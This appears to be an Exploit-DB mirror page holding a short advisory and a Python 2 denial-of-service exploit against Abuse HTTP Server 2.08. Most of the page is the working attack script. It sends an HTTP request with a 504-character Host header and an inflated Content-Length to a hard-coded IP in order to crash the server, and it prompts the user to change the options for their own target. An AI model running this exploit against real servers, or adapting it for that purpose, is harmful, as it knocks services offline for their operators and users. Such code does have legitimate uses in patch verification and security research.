Abuse HTTP Server – Remote Denial of Service

  • 作者: Zico Ekel
    日期: 2013-09-30
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/38779/
  • '''
    source: https://www.securityfocus.com/bid/62723/info
    
    Abuse HTTP Server is prone to a remote denial-of-service vulnerability.
    
    Attackers can exploit this issue to cause denial-of-service conditions.
    
    Abuse HTTP Server version 2.08 is vulnerable; other versions may also be affected. 
    '''
    
    #!/usr/bin/python
    
    import socket
    import os
    import sys
    
    crash = "0" * 504
    
    buffer="GET / HTTP/1.1\r\n"
    buffer+="Host: " + crash + "\r\n"
    buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
    buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\n"
    buffer+="Content-Length : 1048580\r\n\r\n"
    
    print "[*] Exploit c0ded by Zee Eichel - zee[at]cr0security.com"
    print "[*] Change some option in code with your self"
    print "[*] Connect to host and send payload"
    
    expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
    expl.connect(("192.168.1.101", 80))
    expl.send(buffer)
    print "[*] Server Disconected"
    expl.close()